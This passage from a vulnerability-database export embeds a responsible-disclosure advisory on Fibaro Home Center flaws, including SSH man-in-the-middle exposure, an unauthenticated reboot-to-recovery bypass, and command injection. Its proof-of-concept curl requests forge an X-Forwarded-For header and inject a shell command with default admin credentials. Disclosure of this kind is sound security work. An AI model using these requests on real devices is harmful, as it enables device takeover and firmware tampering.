return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. \n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. \n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20989",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "id": "VAR-202104-0467",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.451000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Fibaro Home Center 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147739"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-295",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/862.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "date": "2021-04-19T14:15:11.570000",
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "date": "2022-08-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "date": "2024-11-21T05:47:20.583000",
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FIBARO Home Center 2 Trust Management Issue Vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0490

    Vulnerability from variot - Updated: 2024-11-23 22:05

    In Fibaro Home Center 2 and Lite devices in all versions provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens and passwords. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities 
    
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
    
                        https://www.fibaro.com/
    
    vulnerable version: 4.600 and older
    
         fixed version: 4.610
    
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, 
    
                        CVE-2021-20992
    
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        9.8 (critical)
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
              reported: 2020-11-18
    
           publication: 2021-04-08
    
                    by: Marton Illes, IoT Inspector Research Lab
    
                        https://www.iot-inspector.com/
    
    
    
    
    
    
    
    Vendor description:
    
    -------------------
    
    "FIBARO is a global brand based on the Internet of Things technology. It 
    
    provides solutions for building and home automation. FIBARO's headquarters
    
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    
    employs app. 250 employees."
    
    
    
    https://www.fibaro.com/en/about-us/
    
    
    
    
    
    Vulnerability overview/description:
    
    -----------------------------------
    
    1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)
    
    Home Center devices initiate SSH connections to the Fibaro cloud to provide 
    
    remote access and remote support capabilities. This connection can be 
    
    intercepted using a man-in-the-middle attack and a device initiated remote 
    
    port-forward channel can be used to connect to the web management interface. 
    
    
    IoT Inspector identified a disabled SSH host key check, which enables 
    
    man-in-the-middle attacks. 
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode 
    
    (CVE-2021-20990)
    
    An internal management service is accessible on port 8000 and some API 
    
    endpoints could be accessed without authentication to trigger a shutdown, a 
    
    reboot, or a reboot into recovery mode. In recovery mode, an attacker can 
    
    upload firmware without authentication. (Potentially an earlier version with
    
    
    known remote command execution vulnerability, see #3)
    
    
    
    3) Authenticated remote command execution (versions before 4.550) 
    
    (CVE-2021-20991)
    
    An authenticated user can run commands as root user using a command
    injection 
    
    vulnerability. The management 
    
    interface is only available over HTTP on the local network. The vendor 
    
    recommends using the cloud-based management interface, which is accessible
    over 
    
    HTTPS and requests are forwarded via an encrypted SSH connection between the
    
    
    Fibaro cloud and the device. 
    
    
    
    
    
    Proof of concept:
    
    -----------------
    
    1) Cloud SSH Connection Man-in-the-Middle Attack
    
    
    
    Home Center devices initiate a SSH connection to the Fibaro cloud
    
    
    
    
    
    ./etc/init.d/fibaro/RemoteAccess
    
    
    
    <snip>
    
    DAEMON=/usr/bin/ssh
    
    
    
    .... 
    
    
    
    case "$1" in
    
      start)
    
    
    
                    ..... 
    
    
    
        # get IP
    
        local
    GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria
    l}&HW_Key=${HW_Key}"
    
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
        # get PORT
    
        local
    GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S
    erial}&HW_Key=${HW_Key}"
    
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
                    .... 
    
    
    
        start-stop-daemon --start --background --pidfile "${PIDFILE}"
    --make-pidfile --startas /usr/bin/screen \
    
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80
    remote2@"${IP_Response}"
    
    </snip>
    
    
    
    The device uses dropbear ssh to initiate the connection; option -y disables
    any 
    
    host-key checks, voiding much of the otherwise added transport-layer
    security 
    
    by SSH: "Always accept hostkeys if they are unknown."
    
    
    
    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: 
    
    lb-1.eu.ra.fibaro.com
    
    
    
    An attacker can use DNS spoofing or other means to intercept the connection. 
    By 
    
    using any hostkey, the attacker can successfully authenticate the SSH 
    
    connection. Once the connection is authenticated, the client initiates a
    remote 
    
    port-forward:
    
    -R "${PORT_Response}":localhost:80
    
    
    
    This enables the attacker to access port 80 (management interface) of the 
    
    device. 
    
    
    
    A similar problem exists for remote support connections:
    
    
    
    ./opt/fibaro/scripts/remote-support.lua
    
    <snip>
    
    function handleResponse(response)
    
      responseJson = json.decode(response.data)
    
      print(json.encode(responseJson))
    
    
    
      local autoSSHCommand = 'ssh -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R '  .. responseJson.private_ip..  ':'
    .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
    
      os.execute(autoSSHCommand)
    
    end
    
    
    
    function getSupportData()
    
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='
    .. serialNumber .. '&HW_Key=' .. HWKey
    
      print(remoteUrl)
    
    
    
      http = net.HTTPClient({timeout = 5000})
    
    
    
      http:request(remoteUrl, {
    
        options = {
    
          method = 'GET'
    
        },
    
        success = function(response)
    
          handleResponse(response)
    
        end,
    
        error = function(error)
    
          print(error)
    
        end
    
      })
    
    end
    
    
    
    getSupportData()
    
    </snip>
    
    
    
    Here, the remote support endpoint returns the following data:
    
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY
    .ZZZ"}
    
    
    
    The same dropbear ssh client is used with option -y. In this case, port 22 
    
    (ssh) is made accessible through the port-forward. However, the device only 
    
    allows public key authentication with a hard-coded SSH key. No further
    testing 
    
    has been done on compromising the support SSH connection. 
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    
    
    
    The device is running a nginx server, which forwards some requests to a 
    
    lighttpd server (8000) for further processing:
    
    <snip>
    
                                    proxy_set_header X-Forwarded-For
    $proxy_add_x_forwarded_for;
    
    
    
            location ~* \.php$ {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    
    
            location ~* \.php\?.* {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    </snip>
    
    
    
    The lighttpd server is not only accessible locally, but also via the local 
    
    network. 
    
    
    
    Authentication and authorization is implemented in PHP and there is a
    special 
    
    check for connections originating from within the host. However, when
    checking 
    
    the remote IP address, the header X-Forwarded-For is also considered:
    
    
    
    ./var/www/authorize.php
    
    <snip>
    
    function isLocalRequest()
    
    {
    
        $ipAddress = "";
    
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) 
    
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    
        else
    
            $ipAddress = $_SERVER['REMOTE_ADDR'];
    
    
    
        $whitelist = array( '127.0.0.1', '::1' );
    
        if(in_array($ipAddress, $whitelist))
    
            return true;
    
    
    
        return false;
    
    }
    
    </snip>
    
    
    
    As the lighttpd service available via the network, an attacked can inject
    the 
    
    required header X-Forwarded-For as well. 
    
    
    
    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    
    <snip>
    
    <?php
    
        require_once("../../authorize.php");
    
    
    
        if (!isLocalRequest() && !isAuthorized())
    
        {
    
           sendUnauthorized();
    
        }
    
        else
    
        {
    
            exec("systemShutdown");
    
        }
    
    ?>
    
    </snip>
    
    
    
    ./var/www/services/system/reboot.php
    
    <snip>
    
    
    
    function authorize() 
    
    {
    
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,
    role::INSTALLER));
    
    }
    
    
    
    function handlePOST($text)
    
    {
    
        if (!isLocalRequest() && !authorize())
    
        {
    
           sendUnauthorized();
    
           return;
    
        }
    
    
    
        $params = tryDecodeJson($text);
    
        if(!is_null($params) && isset($params->recovery) && $params->recovery
    === true)
    
            exec("rebootToRecovery");
    
        else
    
            exec("systemReboot");
    
    }
    
    
    
    $requestBody = file_get_contents('php://input');
    
    $requestMethod = $_SERVER['REQUEST_METHOD'];
    
    
    
    if ($requestMethod == "POST") 
    
        handlePOST($requestBody);
    
    else 
    
        setStatusMethodNotAllowed();
    
    
    
    </snip>
    
    
    
    An attacker can issue the the following HTTP request to reboot the device
    into 
    
    recovery mode:
    
    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d
    '{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php
    
    
    
    In recovery mode, firmware images can be updated without authentication. 
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    
    
    
    Backup & restore operations could be triggered though HTTP endpoints:
    
    
    
    ./var/www/services/system/backups.php
    
    <snip>
    
    function restoreBackup($params)
    
    {
    
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
    
        {
    
            setStatusTooManyRequests();
    
            return;
    
        }
    
    
    
        $type = $params->type;
    
        $id = $params->id;
    
        $version = $params->version;
    
    
    
        if (is_null($id) || !is_numeric($id) || $id < 1 ) 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");
    
    
    
        if ($type == "local" && $hcVersion == "HC2" || $type == "remote") 
    
        {
    
            $version ?
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id . ' ' . $version) :
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id);
    
        }
    
        else 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        setStatusAccepted();
    
    }
    
    </snip>
    
    
    
    The parameter $version is not sanitized or escaped, which allows an attacker
    to 
    
    inject shell commands into the exec() call:
    
    
    
    cat > /tmp/exploit <<- EOM
    
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1;
    INJECTED COMMAND"}}
    
    EOM
    
    
    
    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:
    application/json' -d@/tmp/exploit  http://DEVICE/services/system/backups.php
    
    
    
    
    Version 4.550 and later have proper escaping:
    
    <snip>
    
        $version = escapeshellarg($params->version);
    
    </snip>
    
    
    
    
    
    4) Unencrypted management interface
    
    
    
    NMMAP shows a few open ports on the box:
    
    PORT     STATE SERVICE
    
    22/tcp   open  ssh
    
    80/tcp   open  http
    
    8000/tcp open  http-alt
    
    
    
    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. 
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:


    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version

    at the time of the discovery

    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530

    Solution:


    Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1,

    2 and 3.

    Vulnerability 4 is not fixed as the vendor assumes that the local network is

    trusted and the device only provides wired network access. Furthermore, the

    vendor recommends using the cloud-based management interface, which is

    accessible over HTTPS and requests are forwarded via an encrypted SSH

    connection between the Fibaro cloud and the device.

    Advisory URL:


    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:


    2020-11-18: Contacting Fibaro through support@fibaro.com,

            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    

    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn

    2020-11-24: Adivsory sent to Fibaro by email

    2020-12-01: Fibaro confirmed the receipt of the advisory

    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes

    2021-03-16: Fibaro beta release (4.601) with the fixes

    2021-03-24: Fibaro applies for CVE numbers

    2021-03-31: Fibaro GA release (4.610) with the fix

    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector. 
    
    
    
    IoT Inspector is a platform for automated security analysis and compliance 
    
    checks of IoT firmware. Our mission is to secure the Internet of Things. In 
    
    order to discover vulnerabilities and vulnerability patterns within IoT
    devices
    
    and to further enhance automated identification that allows for scalable 
    
    detection within IoT Inspector, we conduct excessive security research in
    the
    
    area of IoT. 
    
    
    
    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT 
    
    firmware, we aim to responsibly disclose relevant information to the vendor
    
    of the affected IoT device as well as the general public in a way that 
    
    minimizes potential harm and encourages further security analyses of IoT 
    
    systems. 
    
    
    
    You can find our responsible disclosure policy here:
    
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0490",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "*"
          },
          {
            "model": "home center 2",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "*"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20992",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-20992",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-20992",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "info@cert.vde.com",
                "availabilityImpact": "HIGH",
